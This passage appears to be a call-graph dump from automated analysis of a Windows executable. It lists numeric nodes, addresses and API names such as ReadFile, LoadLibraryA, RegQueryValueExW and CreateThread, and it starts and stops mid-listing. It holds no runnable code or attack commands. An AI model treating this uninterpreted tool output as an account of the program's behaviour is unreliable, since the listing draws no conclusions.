105308 825305 105305->105308 105309 8252e5 105305->105309 105347 828b28 58 API calls __getptd_noexit 105306->105347 105330 830607 105308->105330 105348 828b28 58 API calls __getptd_noexit 105309->105348 105312 82529f __commit @_EH4_CallFilterFunc@8 105312->105252 105316 8304f4 __commit 105315->105316 105317 829c0b __lock 58 API calls 105316->105317 105328 830502 105317->105328 105318 830576 105350 8305fe 105318->105350 105319 83057d 105355 82881d 58 API calls 2 library calls 105319->105355 105322 830584 105322->105318 105356 829e2b InitializeCriticalSectionAndSpinCount 105322->105356 105323 8305f3 __commit 105323->105304 105325 829c93 __mtinitlocknum 58 API calls 105325->105328 105327 8305aa EnterCriticalSection 105327->105318 105328->105318 105328->105319 105328->105325 105353 826c50 59 API calls __lock 105328->105353 105354 826cba LeaveCriticalSection LeaveCriticalSection _doexit 105328->105354 105338 830627 __wopenfile 105330->105338 105331 830641 105361 828b28 58 API calls __getptd_noexit 105331->105361 105333 830646 105362 828db6 9 API calls __commit 105333->105362 105335 825310 105349 825332 LeaveCriticalSection LeaveCriticalSection __wfsopen 105335->105349 105336 83085f 105358 8385a1 105336->105358 105338->105331 105344 8307fc 105338->105344 105363 8237cb 60 API calls 2 library calls 105338->105363 105340 8307f5 105340->105344 105364 8237cb 60 API calls 2 library calls 105340->105364 105342 830814 105342->105344 105365 8237cb 60 API calls 2 library calls 105342->105365 105344->105331 105344->105336 105345->105300 105346->105312 105347->105312 105348->105312 105349->105312 105357 829d75 LeaveCriticalSection 105350->105357 105352 830605 105352->105323 105353->105328 105354->105328 105355->105322 105356->105327 105357->105352 105366 837d85 105358->105366 105360 8385ba 105360->105335 105361->105333 105362->105335 105363->105340 105364->105342 105365->105344 105367 837d91 __commit 105366->105367 105368 837da7 105367->105368 105370 837ddd 105367->105370 105369 828b28 __commit 58 API calls 105368->105369 105371 837dac 105369->105371 105372 837e4e __wsopen_nolock 109 API calls 105370->105372 105373 828db6 __commit 9 API calls 105371->105373 105374 837df9 105372->105374 105376 837db6 __commit 105373->105376 105375 837e22 __wsopen_helper LeaveCriticalSection 105374->105375 105375->105376 105376->105360 105378 804b83 105377->105378 105379 804c3f LoadLibraryA 105377->105379 105378->105256 105378->105259 105379->105378 105380 804c50 GetProcAddress 105379->105380 105380->105378 105382 820db6 Mailbox 59 API calls 105381->105382 105383 805240 105382->105383 105383->105264 105385 804ea3 FindResourceExW 105384->105385 105387 804ec0 105384->105387 105386 83d933 LoadResource 105385->105386 105385->105387 105386->105387 105388 83d948 SizeofResource 105386->105388 105387->105265 105388->105387 105389 83d95c LockResource 105388->105389 105389->105387 105391 804ef4 105390->105391 105392 83d9ab 105390->105392 105396 82584d 105391->105396 105394 804f02 105394->105276 105395->105265 105397 825859 __commit 105396->105397 105398 82586b 105397->105398 105399 825891 105397->105399 105409 828b28 58 API calls __getptd_noexit 105398->105409 105401 826c11 __lock_file 59 API calls 105399->105401 105404 825897 105401->105404 105402 825870 105410 828db6 9 API calls __commit 105402->105410 105411 8257be 83 API calls 5 library calls 105404->105411 105406 8258a6 105412 8258c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 105406->105412 105408 82587b __commit 105408->105394 105409->105402 105410->105408 105411->105406 105412->105408 105416 8255fd 105413->105416 105415 804f2e 105415->105284 105417 825609 __commit 105416->105417 105418 82561f _memset 105417->105418 105419 82564c 105417->105419 105420 825644 __commit 105417->105420 105443 828b28 58 API calls __getptd_noexit 105418->105443 105421 826c11 __lock_file 59 API calls 105419->105421 105420->105415 105423 825652 105421->105423 105429 82541d 105423->105429 105424 825639 105444 828db6 9 API calls __commit 105424->105444 105433 825438 _memset 105429->105433 105435 825453 105429->105435 105430 825443 105534 828b28 58 API calls __getptd_noexit 105430->105534 105432 825448 105535 828db6 9 API calls __commit 105432->105535 105433->105430 105433->105435 105438 825493 105433->105438 105445 825686 LeaveCriticalSection LeaveCriticalSection __wfsopen 105435->105445 105437 8255a4 _memset 105537 828b28 58 API calls __getptd_noexit 105437->105537 105438->105435 105438->105437 105439 8246e6 _fprintf 58 API calls 105438->105439 105446 830e5b 105438->105446 105514 830ba7 105438->105514 105536 830cc8 58 API calls 3 library calls 105438->105536 105439->105438 105443->105424 105444->105420 105445->105420 105447 830e93 105446->105447 105448 830e7c 105446->105448 105450 8315cb 105447->105450 105453 830ecd 105447->105453 105449 828af4 __commit 58 API calls 105448->105449 105452 830e81 105449->105452 105451 828af4 __commit 58 API calls 105450->105451 105454 8315d0 105451->105454 105455 828b28 __commit 58 API calls 105452->105455 105456 830ed5 105453->105456 105463 830eec 105453->105463 105457 828b28 __commit 58 API calls 105454->105457 105494 830e88 105455->105494 105458 828af4 __commit 58 API calls 105456->105458 105459 830ee1 105457->105459 105460 830eda 105458->105460 105461 828db6 __commit 9 API calls 105459->105461 105464 828b28 __commit 58 API calls 105460->105464 105461->105494 105462 830f01 105465 828af4 __commit 58 API calls 105462->105465 105463->105462 105466 830f1b 105463->105466 105467 830f39 105463->105467 105463->105494 105464->105459 105465->105460 105466->105462 105469 830f26 105466->105469 105468 82881d __malloc_crt 58 API calls 105467->105468 105470 830f49 105468->105470 105471 835c6b __read_nolock 58 API calls 105469->105471 105472 830f51 105470->105472 105473 830f6c 105470->105473 105474 83103a 105471->105474 105475 828b28 __commit 58 API calls 105472->105475 105477 8318c1 __lseeki64_nolock 60 API calls 105473->105477 105476 8310b3 ReadFile 105474->105476 105481 831050 GetConsoleMode 105474->105481 105478 830f56 105475->105478 105479 831593 GetLastError 105476->105479 105480 8310d5 105476->105480 105477->105469 105482 828af4 __commit 58 API calls 105478->105482 105483 8315a0 105479->105483 105484 831093 105479->105484 105480->105479 105489 8310a5 105480->105489 105485 8310b0 105481->105485 105486 831064 105481->105486 105482->105494 105488 828b28 __commit 58 API calls 105483->105488 105491 828b07 __dosmaperr 58 API calls 105484->105491 105496 831099 105484->105496 105485->105476 105486->105485 105487 83106a ReadConsoleW 105486->105487 105487->105489 105490 83108d GetLastError 105487->105490 105492 8315a5 105488->105492 105489->105496 105497 83110a 105489->105497 105498 831377 105489->105498 105490->105484 105491->105496 105493 828af4 __commit 58 API calls 105492->105493 105493->105496 105494->105438 105495 822d55 _free 58 API calls 105495->105494 105496->105494 105496->105495 105500 831176 ReadFile 105497->105500 105506 8311f7 105497->105506 105498->105496 105501 83147d ReadFile 105498->105501 105502 831197 GetLastError 105500->105502 105512 8311a1 105500->105512 105505 8314a0 GetLastError 105501->105505 105513 8314ae 105501->105513 105502->105512 105503 8312b4 105508 831264 MultiByteToWideChar 105503->105508 105509 8318c1 __lseeki64_nolock 60 API calls 105503->105509 105504 8312a4 105507 828b28 __commit 58 API calls 105504->105507 105505->105513 105506->105496 105506->105503 105506->105504 105506->105508 105507->105496 105508->105490 105508->105496 105509->105508 105510 8318c1 __lseeki64_nolock 60 API calls 105510->105512 105511 8318c1 __lseeki64_nolock 60 API calls 105511->105513 105512->105497 105512->105510 105513->105498 105513->105511 105515 830bb2 105514->105515 105519 830bc7 105514->105519 105517 828b28 __commit 58 API calls 105515->105517 105516 830bc2 105516->105438 105518 830bb7 105517->105518 105520 828db6 __commit 9 API calls 105518->105520 105519->105516 105521 830bfc 105519->105521 105522 835fe4 __getbuf 58 API calls 105519->105522 105520->105516 105523 8246e6 _fprintf 58 API calls 105521->105523 105522->105521 105524 830c10 105523->105524 105525 830d47 __read 72 API calls 105524->105525 105526 830c17 105525->105526 105526->105516 105527 8246e6 _fprintf 58 API calls 105526->105527 105528 830c3a 105527->105528 105528->105516 105529 8246e6 _fprintf 58 API calls 105528->105529 105530 830c46 105529->105530 105530->105516 105531 8246e6 _fprintf 58 API calls 105530->105531 105532 830c53 105531->105532 105533 8246e6 _fprintf 58 API calls 105532->105533 105533->105516 105534->105432 105535->105435 105536->105438 105537->105432 105541 82520a GetSystemTimeAsFileTime 105538->105541 105540 868f6e 105540->105286 105542 825238 __aulldiv 105541->105542 105542->105540 105544 825c6c __commit 105543->105544 105545 825c93 105544->105545 105546 825c7e 105544->105546 105548 826c11 __lock_file 59 API calls 105545->105548 105557 828b28 58 API calls __getptd_noexit 105546->105557 105550 825c99 105548->105550 105549 825c83 105558 828db6 9 API calls __commit 105549->105558 105559 8258d0 67 API calls 6 library calls 105550->105559 105553 825ca4 105560 825cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 105553->105560 105555 825cb6 105556 825c8e __commit 105555->105556 105556->105291 105557->105549 105558->105556 105559->105553 105560->105555 105562 8078b7 105561->105562 105563 80785a 105561->105563 105565 807d2c 59 API calls 105562->105565 105563->105562 105564 807865 105563->105564 105567 807880 105564->105567 105568 83eb09 105564->105568 105566 807888 _memmove 105565->105566 105566->105101 105579 807f27 59 API calls Mailbox 105567->105579 105570 808029 59 API calls 105568->105570 105571 83eb13 105570->105571 105572 820db6 Mailbox 59 API calls 105571->105572 105573 83eb33 105572->105573 105575 807da6 105574->105575 105577 807d99 105574->105577 105576 820db6 Mailbox 59 API calls 105575->105576 105576->105577 105577->105095 105578->105123 105579->105566 105580->105170 105581->105172 105582->105222 105584 82486f __commit 105583->105584 105585 8248a5 105584->105585 105586 82488d 105584->105586 105587 82489d __commit 105584->105587 105588 826c11 __lock_file 59 API calls 105585->105588 105650 828b28 58 API calls __getptd_noexit 105586->105650 105587->105234 105604 869748 __tzset_nolock _wcscmp 105599->105604 105600 804f0b 74 API calls 105600->105604 105601 869210 105601->105202 105605 8240fb 58 API calls __wsplitpath_helper 105601->105605 105602 869109 GetSystemTimeAsFileTime 105602->105604 105603 804ee5 85 API calls 105603->105604 105604->105600 105604->105601 105604->105602 105604->105603 105605->105205 105606->105213 105698->104515 105699->104512 105700->104414 105701->104414 105702->104407 105703->104413 105704->104417 105705->104413 105706->104438 105707 827c56 105708 827c62 __commit 105707->105708 105744 829e08 GetStartupInfoW 105708->105744 105711 827cbf 105715 827cca 105711->105715 105829 827da6 58 API calls 3 library calls 105711->105829 105712 827c67 105746 828b7c GetProcessHeap 105712->105746 105747 829ae6 105715->105747 105716 827cd0 105717 827cdb __RTC_Initialize 105716->105717 105830 827da6 58 API calls 3 library calls 105716->105830 105768 82d5d2 105717->105768 105720 827cea 105721 827cf6 GetCommandLineW 105720->105721 105831 827da6 58 API calls 3 library calls 105720->105831 105787 834f23 GetEnvironmentStringsW 105721->105787 105724 827cf5 105724->105721 105727 827d10 105728 827d1b 105727->105728 105832 8230b5 58 API calls 3 library calls 105727->105832 105797 834d58 105728->105797 105731 827d21 105732 827d2c 105731->105732 105833 8230b5 58 API calls 3 library calls 105731->105833 105811 8230ef 105732->105811 105735 827d34 105736 827d3f __wwincmdln 105735->105736 105834 8230b5 58 API calls 3 library calls 105735->105834 105817 8047d0 105736->105817 105739 827d53 105740 827d62 105739->105740 105835 823358 58 API calls _doexit 105739->105835 105836 8230e0 58 API calls _doexit 105740->105836 105743 827d67 __commit 105745 829e1e 105744->105745 105745->105712 105746->105711 105837 823187 36 API calls 2 library calls 105747->105837 105749 829aeb 105838 829d3c InitializeCriticalSectionAndSpinCount __getstream 105749->105838 105751 829af0 105752 829af4 105751->105752 105840 829d8a TlsAlloc 105751->105840 105839 829b5c 61 API calls 2 library calls 105752->105839 105755 829af9 105755->105716 105756 829b06 105756->105752 105757 829b11 105756->105757 105841 8287d5 105757->105841 105760 829b53 105849 829b5c 61 API calls 2 library calls 105760->105849 105763 829b32 105763->105760 105765 829b38 105763->105765 105764 829b58 105764->105716 105848 829a33 58 API calls 4 library calls 105765->105848 105767 829b40 GetCurrentThreadId 105767->105716 105769 82d5de __commit 105768->105769 105770 829c0b __lock 58 API calls 105769->105770 105771 82d5e5 105770->105771 105772 8287d5 __calloc_crt 58 API calls 105771->105772 105773 82d5f6 105772->105773 105774 82d661 GetStartupInfoW 105773->105774 105775 82d601 __commit @_EH4_CallFilterFunc@8 105773->105775 105776 82d7a5 105774->105776 105783 82d676 105774->105783 105775->105720 105777 82d86d 105776->105777 105781 82d7f2 GetStdHandle 105776->105781 105782 82d805 GetFileType 105776->105782 105862 829e2b InitializeCriticalSectionAndSpinCount 105776->105862 105863 82d87d LeaveCriticalSection _doexit 105777->105863 105779 82d6c4 105779->105776 105784 82d6f8 GetFileType 105779->105784 105861 829e2b InitializeCriticalSectionAndSpinCount 105779->105861 105780 8287d5 __calloc_crt 58 API calls 105780->105783 105781->105776 105782->105776 105783->105776 105783->105779 105783->105780 105784->105779 105788 834f34 105787->105788 105789 827d06 105787->105789 105864 82881d 58 API calls 2 library calls 105788->105864 105793 834b1b GetModuleFileNameW 105789->105793 105791 834f5a _memmove 105792 834f70 FreeEnvironmentStringsW 105791->105792 105792->105789 105794 834b4f _wparse_cmdline 105793->105794 105796 834b8f _wparse_cmdline 105794->105796 105865 82881d 58 API calls 2 library calls 105794->105865 105796->105727 105798 834d71 __wsetenvp 105797->105798 105799 834d69 105797->105799 105800 8287d5 __calloc_crt 58 API calls 105798->105800 105799->105731 105804 834d9a __wsetenvp 105800->105804 105801 834df1 105802 822d55 _free 58 API calls 105801->105802 105802->105799 105803 8287d5 __calloc_crt 58 API calls 105803->105804 105804->105799 105804->105801 105804->105803 105805 834e16 105804->105805 105808 834e2d 105804->105808 105866 834607 58 API calls __commit 105804->105866 105806 822d55 _free 58 API calls 105805->105806 105806->105799 105867 828dc6 IsProcessorFeaturePresent 105808->105867 105810 834e39 105810->105731 105812 8230fb __IsNonwritableInCurrentImage 105811->105812 105882 82a4d1 105812->105882 105814 823119 __initterm_e 105815 822d40 __cinit 67 API calls 105814->105815 105816 823138 _doexit __IsNonwritableInCurrentImage 105814->105816 105815->105816 105816->105735 105818 8047ea 105817->105818 105819 804889 105817->105819 105820 804824 IsThemeActive 105818->105820 105819->105739 105885 82336c 105820->105885 105824 804850 105897 8048fd SystemParametersInfoW SystemParametersInfoW 105824->105897 105826 80485c 105898 803b3a 105826->105898 105828 804864 SystemParametersInfoW 105828->105819 105829->105715 105830->105717 105831->105724 105835->105740 105836->105743 105837->105749 105838->105751 105839->105755 105840->105756 105843 8287dc 105841->105843 105844 828817 105843->105844 105845 8287fa 105843->105845 105850 8351f6 105843->105850 105844->105760 105847 829de6 TlsSetValue 105844->105847 105845->105843 105845->105844 105858 82a132 Sleep 105845->105858 105847->105763 105848->105767 105849->105764 105851 835201 105850->105851 105856 83521c 105850->105856 105852 83520d 105851->105852 105851->105856 105859 828b28 58 API calls __getptd_noexit 105852->105859 105854 83522c RtlAllocateHeap 105855 835212 105854->105855 105854->105856 105855->105843 105856->105854 105856->105855 105860 8233a1 DecodePointer 105856->105860 105858->105845 105859->105855 105860->105856 105861->105779 105862->105776 105863->105775 105864->105791 105865->105796 105866->105804 105868 828dd1 105867->105868 105873 828c59 105868->105873 105872 828dec 105872->105810 105874 828c73 _memset __call_reportfault 105873->105874 105875 828c93 IsDebuggerPresent 105874->105875 105881 82a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 105875->105881 105877 82c5f6 __fltin2 6 API calls 105879 828d7a 105877->105879 105878 828d57 __call_reportfault 105878->105877 105880 82a140 GetCurrentProcess TerminateProcess 105879->105880 105880->105872 105881->105878 105883 82a4d4 EncodePointer 105882->105883 105883->105883 105884 82a4ee 105883->105884 105884->105814 105886 829c0b __lock 58 API calls 105885->105886 105887 823377 DecodePointer EncodePointer 105886->105887 105950 829d75 LeaveCriticalSection 105887->105950 105889 804849 105890 8233d4 105889->105890 105891 8233f8 105890->105891 105892 8233de 105890->105892 105891->105824 105892->105891 105951 828b28 58 API calls __getptd_noexit 105892->105951 105894 8233e8 105952 828db6 9 API calls __commit 105894->105952 105896 8233f3 105896->105824 105897->105826 105899 803b47 __write_nolock 105898->105899 105900 807667 59 API calls 105899->105900 105901 803b51 GetCurrentDirectoryW 105900->105901 105953 803766 105901->105953 105903 803b7a IsDebuggerPresent 105904 83d272 MessageBoxA 105903->105904 105905 803b88 105903->105905 105907 83d28c 105904->105907 105905->105907 105908 803ba5 105905->105908 105937 803c61 105905->105937 105906 803c68 SetCurrentDirectoryW 105913 803c75 Mailbox 105906->105913 106075 807213 59 API calls Mailbox 105907->106075 106034 807285 105908->106034 105913->105828 105914 83d29c 105917 83d2b2 SetCurrentDirectoryW 105914->105917 105917->105913 105937->105906 105950->105889 105951->105894 105952->105896 105954 807667 59 API calls 105953->105954 105955 80377c 105954->105955 106084 803d31 105955->106084 105957 80379a 105958 804706 61 API calls 105957->105958 105959 8037ae 105958->105959 105960 807de1 59 API calls 105959->105960 105961 8037bb 105960->105961 105962 804ddd 136 API calls 105961->105962 105963 8037d4 105962->105963 105964 83d173 105963->105964 105965 8037dc Mailbox 105963->105965 106137 86955b 105964->106137 105968 808047 59 API calls 105965->105968 105971 8037ef 105968->105971 105969 83d192 105970 822d55 _free 58 API calls 105969->105970 105973 83d19f 105970->105973 106098 80928a 105971->106098 105972 804e4a 84 API calls 105972->105969 105975 804e4a 84 API calls 105973->105975 105977 83d1a8 105975->105977 105981 803ed0 59 API calls 105977->105981 105978 807de1 59 API calls 105979 803808 105978->105979 105980 8084c0 69 API calls 105979->105980 105982 80381a Mailbox 105980->105982 105983 83d1c3 105981->105983 105984 807de1 59 API calls 105982->105984 105985 803ed0 59 API calls 105983->105985 105986 803840 105984->105986 105987 83d1df 105985->105987 105988 8084c0 69 API calls 105986->105988 105989 804706 61 API calls 105987->105989 105991 80384f Mailbox 105988->105991 105990 83d204 105989->105990 105992 803ed0 59 API calls 105990->105992 105994 807667 59 API calls 105991->105994 105993 83d210 105992->105993 105995 808047 59 API calls 105993->105995 105996 80386d 105994->105996 105997 83d21e 105995->105997 106101 803ed0 105996->106101 105999 803ed0 59 API calls 105997->105999 106001 83d22d 105999->106001 106007 808047 59 API calls 106001->106007 106003 803887 106003->105977 106004 803891 106003->106004 106005 822efd _W_store_winword 60 API calls 106004->106005 106006 80389c 106005->106006 106006->105983 106008 8038a6 106006->106008 106009 83d24f 106007->106009 106010 822efd _W_store_winword 60 API calls 106008->106010 106012 803ed0 59 API calls 106009->106012 106011 8038b1 106010->106011 106011->105987 106014 8038bb 106011->106014 106013 83d25c 106012->106013 106013->106013 106015 822efd _W_store_winword 60 API calls 106014->106015 106016 8038c6 106015->106016 106016->106001 106017 803907 106016->106017 106019 803ed0 59 API calls 106016->106019 106017->106001 106018 803914 106017->106018 106117 8092ce 106018->106117 106020 8038ea 106019->106020 106022 808047 59 API calls 106020->106022 106025 8038f8 106022->106025 106027 803ed0 59 API calls 106025->106027 106027->106017 106029 80394f 106030 80928a 59 API calls 106029->106030 106031 808ee0 60 API calls 106029->106031 106032 803ed0 59 API calls 106029->106032 106033 803995 Mailbox 106029->106033 106030->106029 106031->106029 106032->106029 106033->105903 106035 807292 __write_nolock 106034->106035 106036 8072ab 106035->106036 106038 83ea22 _memset 106035->106038 106193 804750 106036->106193 106040 83ea3e GetOpenFileNameW 106038->106040 106042 83ea8d 106040->106042 106044 807bcc 59 API calls 106042->106044 106046 83eaa2 106044->106046 106046->106046 106047 8072c9 106221 80686a 106047->106221 106075->105914 106085 803d3e __write_nolock 106084->106085 106086 807bcc 59 API calls 106085->106086 106097 803ea4 Mailbox 106085->106097 106088 803d70 106086->106088 106087 8079f2 59 API calls 106087->106088 106088->106087 106090 803da6 Mailbox 106088->106090 106089 8079f2 59 API calls 106089->106090 106090->106089 106091 803e77 106090->106091 106093 807de1 59 API calls 106090->106093 106090->106097 106172 803f74 106090->106172 106092 807de1 59 API calls 106091->106092 106091->106097 106094 803e98 106092->106094 106093->106090 106095 803f74 59 API calls 106094->106095 106095->106097 106097->105957 106099 820db6 Mailbox 59 API calls 106098->106099 106100 8037fb 106099->106100 106100->105978 106102 803ef3 106101->106102 106103 803eda 106101->106103 106104 807bcc 59 API calls 106102->106104 106105 808047 59 API calls 106103->106105 106106 803879 106104->106106 106105->106106 106107 822efd 106106->106107 106108 822f09 106107->106108 106109 822f7e 106107->106109 106116 822f2e 106108->106116 106178 828b28 58 API calls __getptd_noexit 106108->106178 106180 822f90 60 API calls 3 library calls 106109->106180 106112 822f8b 106112->106003 106113 822f15 106179 828db6 9 API calls __commit 106113->106179 106115 822f20 106115->106003 106116->106003 106118 8092d6 106117->106118 106119 820db6 Mailbox 59 API calls 106118->106119 106120 8092e4 106119->106120 106122 803924 106120->106122 106181 8091fc 59 API calls Mailbox 106120->106181 106123 809050 106122->106123 106182 809160 106123->106182 106125 80905f 106126 820db6 Mailbox 59 API calls 106125->106126 106127 803932 106125->106127 106126->106127 106128 808ee0 106127->106128 106129 83f17c 106128->106129 106132 808ef7 106128->106132 106129->106132 106192 808bdb 59 API calls Mailbox 106129->106192 106131 808fff 106131->106029 106132->106131 106133 809040 106132->106133 106134 808ff8 106132->106134 106191 809d3c 60 API calls Mailbox 106133->106191 106136 820db6 Mailbox 59 API calls 106134->106136 106136->106131 106138 804ee5 85 API calls 106137->106138 106139 8695ca 106138->106139 106140 869734 96 API calls 106139->106140 106141 8695dc 106140->106141 106142 804f0b 74 API calls 106141->106142 106168 83d186 106141->106168 106143 8695f7 106142->106143 106144 804f0b 74 API calls 106143->106144 106145 869607 106144->106145 106146 804f0b 74 API calls 106145->106146 106147 869622 106146->106147 106148 804f0b 74 API calls 106147->106148 106149 86963d 106148->106149 106150 804ee5 85 API calls 106149->106150 106151 869654 106150->106151 106152 82571c std::exception::_Copy_str 58 API calls 106151->106152 106153 86965b 106152->106153 106154 82571c std::exception::_Copy_str 58 API calls 106153->106154 106155 869665 106154->106155 106156 804f0b 74 API calls 106155->106156 106157 869679 106156->106157 106158 869109 GetSystemTimeAsFileTime 106157->106158 106159 86968c 106158->106159 106160 8696b6 106159->106160 106161 8696a1 106159->106161 106163 8696bc 106160->106163 106164 86971b 106160->106164 106162 822d55 _free 58 API calls 106161->106162 106166 8696a7 106162->106166 106167 868b06 116 API calls 106163->106167 106165 822d55 _free 58 API calls 106164->106165 106165->106168 106169 822d55 _free 58 API calls 106166->106169 106170 869713 106167->106170 106168->105969 106168->105972 106169->106168 106171 822d55 _free 58 API calls 106170->106171 106171->106168 106173 803f82 106172->106173 106177 803fa4 _memmove 106172->106177 106175 820db6 Mailbox 59 API calls 106173->106175 106174 820db6 Mailbox 59 API calls 106176 803fb8 106174->106176 106175->106177 106176->106090 106177->106174 106178->106113 106179->106115 106180->106112 106181->106122 106183 809169 Mailbox 106182->106183 106184 83f19f 106183->106184 106189 809173 106183->106189 106185 820db6 Mailbox 59 API calls 106184->106185 106187 83f1ab 106185->106187 106186 80917a 106186->106125 106189->106186 106190 809c90 59 API calls Mailbox 106189->106190 106190->106189 106191->106131 106192->106132 106255 831940 106193->106255 106196 804799 106198 807d8c 59 API calls 106196->106198 106197 80477c 106199 807bcc 59 API calls 106197->106199 106200 804788 106198->106200 106199->106200 106257 807726 106200->106257 106203 820791 106204 82079e __write_nolock 106203->106204 106205 82079f GetLongPathNameW 106204->106205 106206 807bcc 59 API calls 106205->106206 106207 8072bd 106206->106207 106208 80700b 106207->106208 106209 807667 59 API calls 106208->106209 106210 80701d 106209->106210 106211 804750 60 API calls 106210->106211 106212 807028 106211->106212 106213 807033 106212->106213 106214 83e885 106212->106214 106215 803f74 59 API calls 106213->106215 106218 83e89f 106214->106218 106267 807908 61 API calls 106214->106267 106217 80703f 106215->106217 106261 8034c2 106217->106261 106220 807052 Mailbox 106220->106047 106222 804ddd 136 API calls 106221->106222 106223 80688f 106222->106223 106224 83e031 106223->106224 106225 804ddd 136 API calls 106223->106225 106226 86955b 122 API calls 106224->106226 106227 8068a3 106225->106227 106228 83e046 106226->106228 106227->106224 106229 8068ab 106227->106229 106230 83e067 106228->106230 106231 83e04a 106228->106231 106233 83e052 106229->106233 106234 8068b7 106229->106234 106232 820db6 Mailbox 59 API calls 106230->106232 106235 804e4a 84 API calls 106231->106235 106247 83e0ac Mailbox 106232->106247 106367 8642f8 90 API calls _wprintf 106233->106367 106268 806a8c 106234->106268 106235->106233 106239 83e060 106239->106230 106240 83e260 106241 822d55 _free 58 API calls 106240->106241 106244 80750f 59 API calls 106244->106247 106247->106240 106247->106244 106249 83e271 106247->106249 106252 807de1 59 API calls 106247->106252 106361 80735d 106247->106361 106368 85f73d 59 API calls 2 library calls 106247->106368 106369 85f65e 61 API calls 2 library calls 106247->106369 106370 86737f 59 API calls Mailbox 106247->106370 106248 822d55 _free 58 API calls 106248->106249 106249->106248 106250 804e4a 84 API calls 106249->106250 106371 85f7a1 89 API calls 4 library calls 106249->106371 106250->106249 106252->106247 106256 80475d GetFullPathNameW 106255->106256 106256->106196 106256->106197 106258 807734 106257->106258 106259 807d2c 59 API calls 106258->106259 106260 804794 106259->106260 106260->106203 106262 8034d4 106261->106262 106266 8034f3 _memmove 106261->106266 106264 820db6 Mailbox 59 API calls 106262->106264 106263 820db6 Mailbox 59 API calls 106265 80350a 106263->106265 106264->106266 106265->106220 106266->106263 106267->106214 106269 806ab5 106268->106269 106270 83e41e 106268->106270 106377 8057a6 60 API calls Mailbox 106269->106377 106393 85f7a1 89 API calls 4 library calls 106270->106393 106273 806ad7 106274 83e431 106362 807370 106361->106362 106364 80741e 106361->106364 106364->106247 106367->106239 106368->106247 106369->106247 106370->106247 106371->106249 106377->106273 106393->106274 106421 e55040 106435 e52c90 106421->106435 106423 e55106 106438 e54f30 106423->106438 106441 e56130 GetPEB 106435->106441 106437 e5331b 106437->106423 106439 e54f39 Sleep 106438->106439 106440 e54f47 106439->106440 106442 e5615a 106441->106442 106442->106437 106443 801055 106448 802649 106443->106448 106446 822d40 __cinit 67 API calls 106447 801064 106446->106447 106449 807667 59 API calls 106448->106449 106450 8026b7 106449->106450 106455 803582 106450->106455 106453 802754 106454 80105a 106453->106454 106458 803416 59 API calls 2 library calls 106453->106458 106454->106446 106459 8035b0 106455->106459 106458->106453 106460 8035bd 106459->106460 106462 8035a1 106459->106462 106461 8035c4 RegOpenKeyExW 106460->106461 106460->106462 106461->106462 106463 8035de RegQueryValueExW 106461->106463 106462->106453 106464 803614 RegCloseKey 106463->106464 106465 8035ff 106463->106465 106464->106462 106465->106464 106466 801016 106471 804974 106466->106471 106469 822d40 __cinit 67 API calls 106470 801025 106469->106470 106472 820db6 Mailbox 59 API calls 106471->106472 106473 80497c 106472->106473 106475 80101b 106473->106475 106478 804936 106473->106478 106475->106469 106479 804951 106478->106479 106480 80493f 106478->106480 106482 8049a0 106479->106482 106481 822d40 __cinit 67 API calls 106480->106481 106481->106479 106483 807667 59 API calls 106482->106483 106484 8049b8 GetVersionExW 106483->106484 106485 807bcc 59 API calls 106484->106485 106486 8049fb 106485->106486 106487 807d2c 59 API calls 106486->106487 106496 804a28 106486->106496 106488 804a1c 106487->106488 106489 807726 59 API calls 106488->106489 106489->106496 106490 804a93 GetCurrentProcess IsWow64Process 106492 804aac 106490->106492 106491 83d864 106493 804ac2 106492->106493 106494 804b2b GetSystemInfo 106492->106494 106506 804b37 106493->106506 106495 804af8 106494->106495 106495->106475 106496->106490 106496->106491 106499 804ad4 106501 804b37 2 API calls 106499->106501 106500 804b1f GetSystemInfo 106502 804ae9 106500->106502 106503 804adc GetNativeSystemInfo 106501->106503 106502->106495 106504 804aef FreeLibrary 106502->106504 106503->106502 106504->106495 106507 804ad0 106506->106507 106508 804b40 LoadLibraryA 106506->106508 106507->106499 106507->106500 106508->106507 106509 804b51 GetProcAddress 106508->106509 106509->106507 106510 801066 106515 80f76f 106510->106515 106512 80106c 106513 822d40 __cinit 67 API calls 106512->106513 106514 801076 106513->106514 106516 80f790 106515->106516 106548 81ff03 106516->106548 106520 80f7d7 106521 807667 59 API calls 106520->106521 106522 80f7e1 106521->106522 106523 807667 59 API calls 106522->106523 106524 80f7eb 106523->106524 106525 807667 59 API calls 106524->106525 106526 80f7f5 106525->106526 106527 807667 59 API calls 106526->106527 106528 80f833 106527->106528 106529 807667 59 API calls 106528->106529 106530 80f8fe 106529->106530 106558 815f87 106530->106558 106534 80f930 106535 807667 59 API calls 106534->106535 106536 80f93a 106535->106536 106586 81fd9e 106536->106586 106538 80f981 106539 80f991 GetStdHandle 106538->106539 106540 80f9dd 106539->106540 106541 8445ab 106539->106541 106542 80f9e5 OleInitialize 106540->106542 106541->106540 106543 8445b4 106541->106543 106542->106512 106593 866b38 64 API calls Mailbox 106543->106593 106545 8445bb 106594 867207 CreateThread 106545->106594 106547 8445c7 CloseHandle 106547->106542 106595 81ffdc 106548->106595 106551 81ffdc 59 API calls 106552 81ff45 106551->106552 106553 807667 59 API calls 106552->106553 106554 81ff51 106553->106554 106555 807bcc 59 API calls 106554->106555 106556 80f796 106555->106556 106557 820162 6 API calls 106556->106557 106557->106520 106559 807667 59 API calls 106558->106559 106560 815f97 106559->106560 106561 807667 59 API calls 106560->106561 106562 815f9f 106561->106562 106602 815a9d 106562->106602 106565 815a9d 59 API calls 106566 815faf 106565->106566 106567 807667 59 API calls 106566->106567 106568 815fba 106567->106568 106569 820db6 Mailbox 59 API calls 106568->106569 106570 80f908 106569->106570 106571 8160f9 106570->106571 106572 816107 106571->106572 106573 807667 59 API calls 106572->106573 106574 816112 106573->106574 106575 807667 59 API calls 106574->106575 106576 81611d 106575->106576 106577 807667 59 API calls 106576->106577 106578 816128 106577->106578 106579 807667 59 API calls 106578->106579 106580 816133 106579->106580 106581 815a9d 59 API calls 106580->106581 106582 81613e 106581->106582 106583 820db6 Mailbox 59 API calls 106582->106583 106584 816145 RegisterWindowMessageW 106583->106584 106584->106534 106587 85576f 106586->106587 106588 81fdae 106586->106588 106605 869ae7 60 API calls 106587->106605 106589 820db6 Mailbox 59 API calls 106588->106589 106592 81fdb6 106589->106592 106591 85577a 106592->106538 106593->106545 106594->106547 106606 8671ed 65 API calls 106594->106606 106596 807667 59 API calls 106595->106596 106597 81ffe7 106596->106597 106598 807667 59 API calls 106597->106598 